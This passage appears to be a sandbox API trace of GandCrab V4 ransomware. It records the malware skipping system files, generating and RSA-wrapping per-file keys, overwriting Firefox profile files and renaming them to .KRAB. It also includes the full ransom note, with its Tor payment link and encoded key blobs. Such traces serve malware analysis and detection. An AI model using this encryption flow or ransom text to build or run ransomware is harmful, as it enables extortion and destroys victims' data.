dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.423] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".js ") returned 4 [0083.423] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.423] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned 95 [0083.423] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned 95 [0083.423] lstrcmpiW (lpString1="sessionstore.js", lpString2="desktop.ini") returned 1 [0083.423] lstrcmpiW (lpString1="sessionstore.js", lpString2="autorun.inf") returned 1 [0083.423] lstrcmpiW (lpString1="sessionstore.js", lpString2="ntuser.dat") returned 1 [0083.423] lstrcmpiW (lpString1="sessionstore.js", lpString2="iconcache.db") returned 1 [0083.423] lstrcmpiW (lpString1="sessionstore.js", lpString2="bootsect.bak") returned 1 [0083.423] lstrcmpiW (lpString1="sessionstore.js", lpString2="boot.ini") returned 1 [0083.423] lstrcmpiW (lpString1="sessionstore.js", lpString2="ntuser.dat.log") returned 1 [0083.423] lstrcmpiW (lpString1="sessionstore.js", lpString2="thumbs.db") returned -1 [0083.424] lstrcmpiW (lpString1="sessionstore.js", lpString2="KRAB-DECRYPT.html") returned 1 [0083.424] lstrcmpiW (lpString1="sessionstore.js", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.424] lstrcmpiW (lpString1="sessionstore.js", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.424] lstrcmpiW (lpString1="sessionstore.js", lpString2="ntldr") returned 1 [0083.424] lstrcmpiW (lpString1="sessionstore.js", lpString2="NTDETECT.COM") returned 1 [0083.424] lstrcmpiW (lpString1="sessionstore.js", lpString2="Bootfont.bin") returned 1 [0083.424] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.424] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010bd8) returned 1 [0083.426] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.426] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.426] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.426] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0083.426] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0083.426] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.427] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010df8) returned 1 [0083.428] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.429] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.429] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.429] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0083.429] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0083.429] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.452] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10111b0) returned 1 [0083.453] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0083.454] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.454] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.454] GetLastError () returned 0x0 [0083.454] CryptDestroyKey (hKey=0x10235f8) returned 1 [0083.454] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0083.454] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010930) returned 1 [0083.456] CryptImportKey (in: hProv=0x1010930, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0083.456] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.456] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.456] GetLastError () returned 0x0 [0083.456] CryptDestroyKey (hKey=0x10235f8) returned 1 [0083.456] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0083.456] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0083.459] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.459] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.459] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x3da, lpOverlapped=0x0) returned 1 [0083.488] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffffc26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.488] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x3da, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x3da, lpOverlapped=0x0) returned 1 [0083.489] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0083.489] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.493] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.493] CloseHandle (hObject=0x7ec) returned 1 [0083.494] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.494] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore.js"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore.js.krab")) returned 1 [0083.495] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.495] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0083.495] lstrcmpW (lpString1="SiteSecurityServiceState.txt", lpString2=".") returned 1 [0083.495] lstrcmpW (lpString1="SiteSecurityServiceState.txt", lpString2="..") returned 1 [0083.495] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="SiteSecurityServiceState.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt" [0083.495] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.495] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt.KRAB") returned 113 [0083.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned 108 [0083.496] lstrlenW (lpString=".txt") returned 4 [0083.496] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.496] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.496] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned 108 [0083.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt") returned 108 [0083.496] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="desktop.ini") returned 1 [0083.496] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="autorun.inf") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="ntuser.dat") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="iconcache.db") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="bootsect.bak") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="boot.ini") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="ntuser.dat.log") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="thumbs.db") returned -1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="ntldr") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="NTDETECT.COM") returned 1 [0083.497] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="Bootfont.bin") returned 1 [0083.497] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.497] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10111b0) returned 1 [0083.499] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.499] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.499] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.500] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0083.500] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0083.500] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.500] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011700) returned 1 [0083.501] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.502] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.502] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.502] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0083.502] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0083.502] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.503] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011898) returned 1 [0083.504] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10231f8) returned 1 [0083.504] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.504] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.504] GetLastError () returned 0x0 [0083.504] CryptDestroyKey (hKey=0x10231f8) returned 1 [0083.504] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0083.505] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011238) returned 1 [0083.506] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0083.506] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.506] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.506] GetLastError () returned 0x0 [0083.506] CryptDestroyKey (hKey=0x10235f8) returned 1 [0083.506] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0083.507] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sitesecurityservicestate.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0083.511] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.512] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.512] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x788, lpOverlapped=0x0) returned 1 [0083.550] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffff878, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.550] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x788, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x788, lpOverlapped=0x0) returned 1 [0083.550] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0083.550] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.554] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.554] CloseHandle (hObject=0x7ec) returned 1 [0083.555] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.555] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sitesecurityservicestate.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SiteSecurityServiceState.txt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sitesecurityservicestate.txt.krab")) returned 1 [0083.556] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.556] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0083.556] lstrcmpW (lpString1="storage", lpString2=".") returned 1 [0083.556] lstrcmpW (lpString1="storage", lpString2="..") returned 1 [0083.556] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="storage" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage" [0083.556] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\" [0083.556] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0083.557] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0083.557] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0083.557] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0083.557] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0083.557] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.557] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.557] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\\\KRAB-DECRYPT.txt") returned 105 [0083.558] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0083.558] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0083.558] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, 